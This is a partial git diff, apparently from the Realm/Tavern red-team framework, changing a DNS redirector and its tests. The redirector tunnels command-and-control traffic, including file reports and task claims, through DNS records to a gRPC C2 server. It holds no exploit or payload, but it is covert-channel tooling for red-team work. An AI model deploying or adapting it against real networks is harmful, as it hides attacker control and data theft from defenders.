metadata.NewOutgoingContext(ctx, md) - // Determine if this is a streaming method isClientStreaming := methodPath == "/c2.C2/ReportFile" isServerStreaming := methodPath == "/c2.C2/FetchAsset" @@ -715,9 +662,7 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, 
upstream *grpc.Clien return nil, fmt.Errorf("failed to create stream: %w", err) } - // Send request if isClientStreaming { - // For client streaming (ReportFile), parse length-prefixed chunks and send individually offset := 0 chunkCount := 0 for offset < len(requestData) { @@ -725,7 +670,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien break } - // Read 4-byte length prefix msgLen := binary.BigEndian.Uint32(requestData[offset : offset+4]) offset += 4 @@ -733,7 +677,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien return nil, fmt.Errorf("invalid chunk length: %d bytes at offset %d", msgLen, offset) } - // Send individual chunk (already encrypted) chunk := requestData[offset : offset+int(msgLen)] if err := stream.SendMsg(chunk); err != nil { return nil, fmt.Errorf("failed to send chunk %d: %w", chunkCount, err) @@ -745,7 +688,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien slog.Debug("sent client streaming chunks", "method", methodPath, "chunks", chunkCount) } else { - // For unary/server-streaming, send the request as-is if err := stream.SendMsg(requestData); err != nil { return nil, fmt.Errorf("failed to send request: %w", err) } @@ -755,16 +697,13 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien return nil, fmt.Errorf("failed to close send: %w", err) } - // Receive response(s) var responseData []byte if isServerStreaming { - // For server streaming (FetchAsset), receive multiple chunks with length prefixes responseCount := 0 for { var msg []byte err := stream.RecvMsg(&msg) if err != nil { - // Check for EOF (normal end of stream) if errors.Is(err, io.EOF) { break } @@ -772,7 +711,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien } if len(msg) > 0 { - // Add 4-byte length prefix before each response chunk lengthPrefix := make([]byte, 4) binary.BigEndian.PutUint32(lengthPrefix, 
uint32(len(msg))) responseData = append(responseData, lengthPrefix...) @@ -782,7 +720,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien } slog.Debug("received server streaming responses", "method", methodPath, "count", responseCount) } else { - // For unary, receive single response if err := stream.RecvMsg(&responseData); err != nil { return nil, fmt.Errorf("failed to receive response: %w", err) } @@ -812,7 +749,6 @@ func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) offset += length } - // Skip the null terminator (0x00) offset++ if offset+2 > len(data) { @@ -828,20 +764,17 @@ func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) // sendDNSResponse sends a DNS response with appropriate record type (TXT/A/AAAA) // For A/AAAA records with data larger than 4/16 bytes, multiple answer records are sent func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16, data []byte) { - // For A/AAAA records, base32-encode data first (client expects to decode it) if queryType == aRecordType || queryType == aaaaRecordType { encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(data) data = []byte(encoded) } - // Determine chunk size and number of answer records needed var recordSize int var answerCount uint16 switch queryType { case txtRecordType: - // TXT can handle all data in one record (with internal chunking) - recordSize = 0 // Special case - handled separately + recordSize = 0 answerCount = 1 case aRecordType: recordSize = 4 @@ -856,7 +789,6 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans answerCount = 1 } default: - // Unknown type - single empty record recordSize = 0 answerCount = 1 } @@ -871,7 +803,6 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans response = append(response, 0x00, 0x00) // Authority RRs: 0 response = 
append(response, 0x00, 0x00) // Additional RRs: 0 - // Question section - echo back the original query type for _, label := range strings.Split(domain, ".") { if len(label) == 0 { continue @@ -883,10 +814,8 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: original query type response = append(response, 0x00, byte(dnsClassIN)) // Class: IN - // Answer section - build multiple records for A/AAAA switch queryType { case txtRecordType: - // TXT record: single record with length-prefixed strings (split into 255-byte chunks) response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: TXT response = append(response, 0x00, byte(dnsClassIN)) // Class: IN @@ -894,9 +823,8 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans var rdata []byte if len(data) == 0 { - rdata = []byte{0x00} // Empty TXT string + rdata = []byte{0x00} } else { - // Split into 255-byte chunks tempData := data for len(tempData) > 0 { chunkSize := len(tempData) @@ -909,22 +837,18 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans } } - // RDLENGTH and RDATA response = append(response, byte(len(rdata)>>8), byte(len(rdata))) response = append(response, rdata...) 
case aRecordType: - // Multiple A records - 4 bytes each for i := uint16(0); i < answerCount; i++ { response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer response = append(response, 0x00, byte(aRecordType)) // Type: A response = append(response, 0x00, byte(dnsClassIN)) // Class: IN response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL - // RDLENGTH: always 4 for A records response = append(response, 0x00, 0x04) - // RDATA: 4 bytes from data, padded with zeros if needed start := int(i) * recordSize end := start + recordSize rdata := make([]byte, 4) @@ -939,17 +863,14 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans } case aaaaRecordType: - // Multiple AAAA records - 16 bytes each for i := uint16(0); i < answerCount; i++ { response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer response = append(response, 0x00, byte(aaaaRecordType)) // Type: AAAA response = append(response, 0x00, byte(dnsClassIN)) // Class: IN response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL - // RDLENGTH: always 16 for AAAA records response = append(response, 0x00, 0x10) - // RDATA: 16 bytes from data, padded with zeros if needed start := int(i) * recordSize end := start + recordSize rdata := make([]byte, 16) @@ -964,7 +885,6 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans } default: - // Unknown type - single empty record response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: match query response = append(response, 0x00, byte(dnsClassIN)) // Class: IN diff --git a/tavern/internal/redirectors/dns/dns_test.go b/tavern/internal/redirectors/dns/dns_test.go index 3fb487023..3bec7bc85 100644 --- a/tavern/internal/redirectors/dns/dns_test.go +++ b/tavern/internal/redirectors/dns/dns_test.go @@ -1,282 +1,993 @@ 
-package dns_test +package dns import ( + "context" + "encoding/base32" + "hash/crc32" "net" + "sort" + "sync" "testing" "time" "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" - "google.golang.org/grpc" - "google.golang.org/grpc/credentials/insecure" - - dnsredirector "realm.pub/tavern/internal/redirectors/dns" + "google.golang.org/protobuf/proto" + "realm.pub/tavern/internal/c2/dnspb" ) -// TestParseListenAddr tests the parseListenAddr function +// TestParseListenAddr tests the ParseListenAddr function func TestParseListenAddr(t *testing.T) { - t.Run("default port with multiple domains", func(t *testing.T) { - addr, domains, err := dnsredirector.ParseListenAddr("0.0.0.0?domain=example.com&domain=foo.bar") + tests := []struct { + name string + input string + expectedAddr string + expectedDomains []string + expectError bool + }{ + { + name: "default port with multiple domains", + input: "0.0.0.0?domain=dnsc2.realm.pub&domain=foo.bar", + expectedAddr: "0.0.0.0:53", + expectedDomains: []string{"dnsc2.realm.pub", "foo.bar"}, + }, + { + name: "custom port with single domain", + input: "127.0.0.1:8053?domain=dnsc2.realm.pub", + expectedAddr: "127.0.0.1:8053", + expectedDomains: []string{"dnsc2.realm.pub"}, + }, + { + name: "no query params", + input: "0.0.0.0:5353", + expectedAddr: "0.0.0.0:5353", + expectedDomains: nil, + }, + { + name: "empty domain value", + input: "0.0.0.0?domain=", + expectedAddr: "0.0.0.0:53", + expectedDomains: nil, + }, + { + name: "mixed valid and empty domains", + input: "0.0.0.0?domain=valid.com&domain=&domain=also.valid", + expectedAddr: "0.0.0.0:53", + expectedDomains: []string{"valid.com", "also.valid"}, + }, + { + name: "malformed URL encoding", + input: "0.0.0.0?domain=%ZZ", + expectError: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + addr, domains, err := ParseListenAddr(tt.input) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + 
assert.Equal(t, tt.expectedAddr, addr) + assert.ElementsMatch(t, tt.expectedDomains, domains) + }) + } +} + +// TestExtractSubdomain tests subdomain extraction from full domain names +func TestExtractSubdomain(t *testing.T) { + r := &Redirector{ + baseDomains: []string{"dnsc2.realm.pub", "foo.bar.com"}, + } + + tests := []struct { + name string + domain string + expectedSubdom string + expectError bool + }{ + { + name: "simple subdomain", + domain: "test.dnsc2.realm.pub", + expectedSubdom: "test", + }, + { + name: "multi-label subdomain", + domain: "a.b.c.dnsc2.realm.pub", + expectedSubdom: "a.b.c", + }, + { + name: "subdomain with longer base domain", + domain: "test.foo.bar.com", + expectedSubdom: "test", + }, + { + name: "no matching base domain", + domain: "test.unknown.com", + expectError: true, + }, + { + name: "only base domain (no subdomain)", + domain: "dnsc2.realm.pub", + expectError: true, + }, + { + name: "case insensitive match", + domain: "test.DNSC2.REALM.PUB", + expectedSubdom: "test", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + subdomain, err := r.extractSubdomain(tt.domain) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + assert.Equal(t, tt.expectedSubdom, subdomain) + }) + } +} + +// TestDecodePacket tests Base32 decoding and protobuf unmarshaling +func TestDecodePacket(t *testing.T) { + r := &Redirector{} + + t.Run("valid INIT packet", func(t *testing.T) { + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + Sequence: 0, + ConversationId: "test1234", + Data: []byte{0x01, 0x02, 0x03}, + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + decoded, err := r.decodePacket(encoded) require.NoError(t, err) - assert.Equal(t, "0.0.0.0:53", addr) - assert.ElementsMatch(t, []string{"example.com", "foo.bar"}, domains) + assert.Equal(t, 
dnspb.PacketType_PACKET_TYPE_INIT, decoded.Type) + assert.Equal(t, "test1234", decoded.ConversationId) + assert.Equal(t, []byte{0x01, 0x02, 0x03}, decoded.Data) }) - t.Run("custom port with single domain", func(t *testing.T) { - addr, domains, err := dnsredirector.ParseListenAddr("127.0.0.1:8053?domain=example.com") + t.Run("valid DATA packet with CRC", func(t *testing.T) { + data := []byte{0xDE, 0xAD, 0xBE, 0xEF} + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + Sequence: 1, + ConversationId: "test5678", + Data: data, + Crc32: crc32.ChecksumIEEE(data), + } + packetBytes, err := proto.Marshal(packet) require.NoError(t, err) - assert.Equal(t, "127.0.0.1:8053", addr) - assert.ElementsMatch(t, []string{"example.com"}, domains) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + decoded, err := r.decodePacket(encoded) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_DATA, decoded.Type) + assert.Equal(t, data, decoded.Data) + }) + + t.Run("DATA packet with invalid CRC", func(t *testing.T) { + data := []byte{0xDE, 0xAD, 0xBE, 0xEF} + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + Sequence: 1, + ConversationId: "test5678", + Data: data, + Crc32: 0xDEADBEEF, // Wrong CRC + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + _, err = r.decodePacket(encoded) + assert.Error(t, err) + assert.Contains(t, err.Error(), "CRC mismatch") + }) + + t.Run("invalid Base32", func(t *testing.T) { + _, err := r.decodePacket("!!!invalid!!!") + assert.Error(t, err) }) - t.Run("malformed domain value", func(t *testing.T) { - _, _, err := dnsredirector.ParseListenAddr("127.0.0.1:8053?domain=%ZZ") + t.Run("invalid protobuf", func(t *testing.T) { + // Valid Base32 but not valid protobuf + encoded := 
base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString([]byte{0xFF, 0xFF, 0xFF}) + _, err := r.decodePacket(encoded) assert.Error(t, err) - assert.Contains(t, err.Error(), "decode domain") }) - t.Run("no query params", func(t *testing.T) { - addr, domains, err := dnsredirector.ParseListenAddr("0.0.0.0:5353") + t.Run("packet with labels (dots)", func(t *testing.T) { + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "test1234", + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + // Split into labels (simulating DNS format) + withDots := encoded[:4] + "." + encoded[4:] + + decoded, err := r.decodePacket(withDots) require.NoError(t, err) - assert.Equal(t, "0.0.0.0:5353", addr) - assert.Empty(t, domains) + assert.Equal(t, "test1234", decoded.ConversationId) }) } -// newTestRedirector creates a test redirector with stubbed upstream -func newTestRedirector() *dnsredirector.Redirector { - return &dnsredirector.Redirector{} +// TestComputeAcksNacks tests the ACK range and NACK computation +func TestComputeAcksNacks(t *testing.T) { + r := &Redirector{} + + tests := []struct { + name string + chunks map[uint32][]byte + expectedAcks []*dnspb.AckRange + expectedNacks []uint32 + }{ + { + name: "empty chunks", + chunks: map[uint32][]byte{}, + expectedAcks: []*dnspb.AckRange{}, + expectedNacks: []uint32{}, + }, + { + name: "single chunk", + chunks: map[uint32][]byte{ + 1: {0x01}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 1}, + }, + expectedNacks: []uint32{}, + }, + { + name: "consecutive chunks", + chunks: map[uint32][]byte{ + 1: {0x01}, + 2: {0x02}, + 3: {0x03}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 3}, + }, + expectedNacks: []uint32{}, + }, + { + name: "gap in middle", + chunks: map[uint32][]byte{ + 1: {0x01}, + 2: {0x02}, + 5: {0x05}, + 6: {0x06}, + }, + expectedAcks: 
[]*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 2}, + {StartSeq: 5, EndSeq: 6}, + }, + expectedNacks: []uint32{3, 4}, + }, + { + name: "multiple gaps", + chunks: map[uint32][]byte{ + 1: {0x01}, + 3: {0x03}, + 5: {0x05}, + 10: {0x0A}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 1}, + {StartSeq: 3, EndSeq: 3}, + {StartSeq: 5, EndSeq: 5}, + {StartSeq: 10, EndSeq: 10}, + }, + expectedNacks: []uint32{2, 4, 6, 7, 8, 9}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + conv := &Conversation{ + Chunks: tt.chunks, + } + + acks, nacks := r.computeAcksNacks(conv) + + // Sort both slices for comparison + sort.Slice(acks, func(i, j int) bool { return acks[i].StartSeq < acks[j].StartSeq }) + + assert.Equal(t, tt.expectedAcks, acks) + assert.Equal(t, tt.expectedNacks, nacks) + }) + } } -// TestInitDataEndLifecycle tests the complete packet handling flow -func TestInitDataEndLifecycle(t *testing.T) { - r := newTestRedirector() +// TestHandleInitPacket tests INIT packet processing +func TestHandleInitPacket(t *testing.T) { + t.Run("valid init packet", func(t *testing.T) { + r := &Redirector{} + + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 5, + DataCrc32: 0x12345678, + FileSize: 1024, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) - // Step 1: Send init packet - // Init payload: [method_code:2][total_chunks:5][crc:4] - methodCode := "ct" // ClaimTasks - totalChunksStr := "00002" // 2 chunks (base36) - testData := []byte{0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08} - crc := dnsredirector.CalculateCRC16(testData) - crcStr := dnsredirector.EncodeBase36CRC(int(crc)) + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } - initPayload := methodCode + totalChunksStr + crcStr - tempConvID := "temp12345678" + responseData, err := r.handleInitPacket(packet) + require.NoError(t, err) + 
require.NotNil(t, responseData) - convID, err := r.HandleInitPacket(tempConvID, initPayload) - require.NoError(t, err) - assert.NotEmpty(t, convID) - assert.Len(t, convID, 12) // CONV_ID_SIZE + // Verify response is a STATUS packet + var statusPacket dnspb.DNSPacket + err = proto.Unmarshal(responseData, &statusPacket) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_STATUS, statusPacket.Type) + assert.Equal(t, "conv1234", statusPacket.ConversationId) + + // Verify conversation was created + val, ok := r.conversations.Load("conv1234") + require.True(t, ok) + conv := val.(*Conversation) + assert.Equal(t, "/c2.C2/ClaimTasks", conv.MethodPath) + assert.Equal(t, uint32(5), conv.TotalChunks) + assert.Equal(t, uint32(0x12345678), conv.ExpectedCRC) + assert.Equal(t, uint32(1024), conv.ExpectedDataSize) + }) - convIDStr := string(convID) + t.Run("invalid init payload", func(t *testing.T) { + r := &Redirector{} - // Verify conversation was created - conv, ok := r.GetConversation(convIDStr) - require.True(t, ok) - assert.Equal(t, "/c2.C2/ClaimTasks", conv.MethodPath) - assert.Equal(t, 2, conv.TotalChunks) - assert.Equal(t, crc, conv.ExpectedCRC) + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: []byte{0xFF, 0xFF}, // Invalid protobuf + } - // Step 2: Send data chunks - chunk0 := testData[:4] - chunk1 := testData[4:] + _, err := r.handleInitPacket(packet) + assert.Error(t, err) + }) - _, err = r.HandleDataPacket(convIDStr, 0, chunk0) - require.NoError(t, err) + t.Run("data size exceeds maximum", func(t *testing.T) { + r := &Redirector{} - _, err = r.HandleDataPacket(convIDStr, 1, chunk1) - require.NoError(t, err) + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 1, + FileSize: MaxDataSize + 1, // Exceeds limit + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) - // Verify chunks were stored - conv, _ = 
r.GetConversation(convIDStr) - assert.Len(t, conv.Chunks, 2) -} + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleInitPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "exceeds maximum") + }) + + t.Run("max conversations reached", func(t *testing.T) { + r := &Redirector{ + conversationCount: MaxActiveConversations, + } -// TestHandleDataPacketUnknownConversation tests error handling for unknown conversation -func TestHandleDataPacketUnknownConversation(t *testing.T) { - r := newTestRedirector() + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 1, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) - _, err := r.HandleDataPacket("nonexistent", 0, []byte{0x01, 0x02}) - assert.Error(t, err) - assert.Contains(t, err.Error(), "unknown conversation") + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleInitPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "max active conversations") + }) } -// TestHandleFetchPacket tests response chunk fetching +// TestHandleFetchPacket tests FETCH packet processing func TestHandleFetchPacket(t *testing.T) { - r := newTestRedirector() + t.Run("fetch single response", func(t *testing.T) { + r := &Redirector{} + responseData := []byte("test response data") + + conv := &Conversation{ + ID: "conv1234", + ResponseData: responseData, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) - t.Run("fetch chunk within bounds - text chunking", func(t *testing.T) { - convID := "test12345678" - conv := &dnsredirector.Conversation{ - ID: convID, - ResponseChunks: []string{"chunk0", "chunk1", "chunk2"}, - IsBinaryChunking: false, - LastActivity: time.Now(), + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + 
ConversationId: "conv1234", } - r.StoreConversation(convID, conv) - // Fetch chunk 1 - data, err := r.HandleFetchPacket(convID, 1) + data, err := r.handleFetchPacket(packet) require.NoError(t, err) - assert.Equal(t, "ok:chunk1", string(data)) - - // Conversation should still exist - _, ok := r.GetConversation(convID) - assert.True(t, ok) + assert.Equal(t, responseData, data) }) - t.Run("fetch chunk within bounds - binary chunking", func(t *testing.T) { - convID := "bin123456789" - conv := &dnsredirector.Conversation{ - ID: convID, - ResponseChunks: []string{string([]byte{0x01, 0x02}), string([]byte{0x03, 0x04})}, - IsBinaryChunking: true, - LastActivity: time.Now(), + t.Run("fetch chunked response metadata", func(t *testing.T) { + r := &Redirector{} + responseData := []byte("full response") + responseCRC := crc32.ChecksumIEEE(responseData) + + conv := &Conversation{ + ID: "conv1234", + ResponseData: responseData, + ResponseChunks: [][]byte{[]byte("chunk1"), []byte("chunk2")}, + ResponseCRC: responseCRC, + LastActivity: time.Now(), } - r.StoreConversation(convID, conv) + r.conversations.Store("conv1234", conv) - // Fetch chunk 0 - data, err := r.HandleFetchPacket(convID, 0) + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: nil, // No payload = request metadata + } + + data, err := r.handleFetchPacket(packet) + require.NoError(t, err) + + var metadata dnspb.ResponseMetadata + err = proto.Unmarshal(data, &metadata) require.NoError(t, err) - assert.Equal(t, []byte{0x01, 0x02}, data) + assert.Equal(t, uint32(2), metadata.TotalChunks) + assert.Equal(t, responseCRC, metadata.DataCrc32) }) - t.Run("fetch beyond bounds triggers cleanup", func(t *testing.T) { - convID := "cleanup12345" - conv := &dnsredirector.Conversation{ - ID: convID, - ResponseChunks: []string{"chunk0"}, - IsBinaryChunking: false, - LastActivity: time.Now(), + t.Run("fetch specific chunk", func(t *testing.T) { + r := &Redirector{} + + conv := 
&Conversation{ + ID: "conv1234", + ResponseData: []byte("full"), + ResponseChunks: [][]byte{[]byte("chunk0"), []byte("chunk1"), []byte("chunk2")}, + LastActivity: time.Now(), } - r.StoreConversation(convID, conv) + r.conversations.Store("conv1234", conv) - // Fetch seq beyond bounds - data, err := r.HandleFetchPacket(convID, 1) + fetchPayload := &dnspb.FetchPayload{ChunkIndex: 2} // 1-indexed + payloadBytes, err := proto.Marshal(fetchPayload) require.NoError(t, err) - assert.Equal(t, "ok:", string(data)) - // Conversation should be deleted - _, ok := r.GetConversation(convID) - assert.False(t, ok) + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: payloadBytes, + } + + data, err := r.handleFetchPacket(packet) + require.NoError(t, err) + assert.Equal(t, []byte("chunk1"), data) // 1-indexed -> 0-indexed + }) + + t.Run("fetch unknown conversation", func(t *testing.T) { + r := &Redirector{} + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "unknown", + } + + _, err := r.handleFetchPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "conversation not found") + }) + + t.Run("fetch with no response ready", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: nil, // No response yet + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + } + + _, err := r.handleFetchPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "no response data") }) - t.Run("fetch from unknown conversation", func(t *testing.T) { - _, err := r.HandleFetchPacket("unknown", 0) + t.Run("fetch chunk out of bounds", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: []byte("full"), + ResponseChunks: [][]byte{[]byte("chunk0")}, + 
LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + fetchPayload := &dnspb.FetchPayload{ChunkIndex: 10} // Out of bounds + payloadBytes, err := proto.Marshal(fetchPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleFetchPacket(packet) assert.Error(t, err) - assert.Contains(t, err.Error(), "unknown conversation") + assert.Contains(t, err.Error(), "invalid chunk index") }) } -// TestCleanupConversations tests conversation expiration -func TestCleanupConversations(t *testing.T) { - r := newTestRedirector() +// TestParseDomainNameAndType tests DNS query parsing +func TestParseDomainNameAndType(t *testing.T) { + r := &Redirector{} + + tests := []struct { + name string + query []byte + expectDomain string + expectType uint16 + expectError bool + }{ + { + name: "valid TXT query", + query: func() []byte { + q := []byte{ + 5, 'd', 'n', 's', 'c', '2', // "dnsc2" + 5, 'r', 'e', 'a', 'l', 'm', // "realm" + 3, 'p', 'u', 'b', // "pub" + 0, // null terminator + 0, 16, // Type: TXT + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "dnsc2.realm.pub", + expectType: 16, + }, + { + name: "valid A query", + query: func() []byte { + q := []byte{ + 4, 't', 'e', 's', 't', // "test" + 5, 'd', 'n', 's', 'c', '2', // "dnsc2" + 5, 'r', 'e', 'a', 'l', 'm', // "realm" + 3, 'p', 'u', 'b', // "pub" + 0, // null terminator + 0, 1, // Type: A + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "test.dnsc2.realm.pub", + expectType: 1, + }, + { + name: "valid AAAA query", + query: func() []byte { + q := []byte{ + 3, 'w', 'w', 'w', // "www" + 4, 't', 'e', 's', 't', // "test" + 3, 'c', 'o', 'm', // "com" + 0, // null terminator + 0, 28, // Type: AAAA + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "www.test.com", + expectType: 28, + }, + { + name: "truncated query", + query: []byte{7, 'e', 'x', 'a'}, // Incomplete + 
expectError: true, + }, + { + name: "query too short for type", + query: []byte{4, 't', 'e', 's', 't', 0}, // Missing type/class + expectError: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + domain, queryType, err := r.parseDomainNameAndType(tt.query) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + assert.Equal(t, tt.expectDomain, domain) + assert.Equal(t, tt.expectType, queryType) + }) + } +} - // Create stale conversation (old timestamp) - staleConvID := "stale1234567" - staleConv := &dnsredirector.Conversation{ - ID: staleConvID, - LastActivity: time.Now().Add(-20 * time.Minute), // Older than timeout +// TestConversationCleanup tests cleanup of stale conversations +func TestConversationCleanup(t *testing.T) { + r := &Redirector{ + conversationTimeout: 15 * time.Minute, } - r.StoreConversation(staleConvID, staleConv) + + // Create stale conversation + staleConv := &Conversation{ + ID: "stale", + LastActivity: time.Now().Add(-20 * time.Minute), + } + r.conversations.Store("stale", staleConv) + r.conversationCount = 1 // Create fresh conversation - freshConvID := "fresh1234567" - freshConv := &dnsredirector.Conversation{ - ID: freshConvID, + freshConv := &Conversation{ + ID: "fresh", LastActivity: time.Now(), } - r.StoreConversation(freshConvID, freshConv) - - // Run cleanup once - r.CleanupConversationsOnce(15 * time.Minute) + r.conversations.Store("fresh", freshConv) + r.conversationCount = 2 + + // Run cleanup + now := time.Now() + r.conversations.Range(func(key, value any) bool { + conv := value.(*Conversation) + conv.mu.Lock() + if now.Sub(conv.LastActivity) > r.conversationTimeout { + r.conversations.Delete(key) + r.conversationCount-- + } + conv.mu.Unlock() + return true + }) - // Verify stale conversation was removed - _, ok := r.GetConversation(staleConvID) + // Verify stale was removed + _, ok := r.conversations.Load("stale") assert.False(t, ok, "stale conversation should be 
removed") - // Verify fresh conversation remains - _, ok = r.GetConversation(freshConvID) + // Verify fresh remains + _, ok = r.conversations.Load("fresh") assert.True(t, ok, "fresh conversation should remain") -} -// stubUpstream provides a minimal gRPC server for testing -type stubUpstream struct { - server *grpc.Server - clientConn *grpc.ClientConn - t *testing.T + assert.Equal(t, int32(1), r.conversationCount) } -func newStubUpstream(t *testing.T, echoData []byte) *stubUpstream { - t.Helper() +// TestConcurrentConversationAccess tests thread safety of conversation handling +func TestConcurrentConversationAccess(t *testing.T) { + r := &Redirector{} - // Create a simple handler that echoes back the request - handler := func(srv any, stream grpc.ServerStream) error { - var reqBytes []byte - if err := stream.RecvMsg(&reqBytes); err != nil { - return err - } - - // Echo back the request data - return stream.SendMsg(echoData) + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 100, + DataCrc32: 0, + FileSize: 0, } - - server := grpc.NewServer(grpc.UnknownServiceHandler(handler)) - - // Start server on random port - listener, err := testListener(t) + payloadBytes, err := proto.Marshal(initPayload) require.NoError(t, err) - go func() { - if err := server.Serve(listener); err != nil && err != grpc.ErrServerStopped { - t.Logf("stub server error: %v", err) - } - }() + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "concurrent", + Data: payloadBytes, + } - // Create client connection - conn, err := grpc.Dial(listener.Addr().String(), grpc.WithTransportCredentials(insecure.NewCredentials())) + _, err = r.handleInitPacket(packet) require.NoError(t, err) - return &stubUpstream{ - server: server, - clientConn: conn, - t: t, + // Concurrent access to store chunks + var wg sync.WaitGroup + for i := uint32(1); i <= 100; i++ { + wg.Add(1) + go func(seq 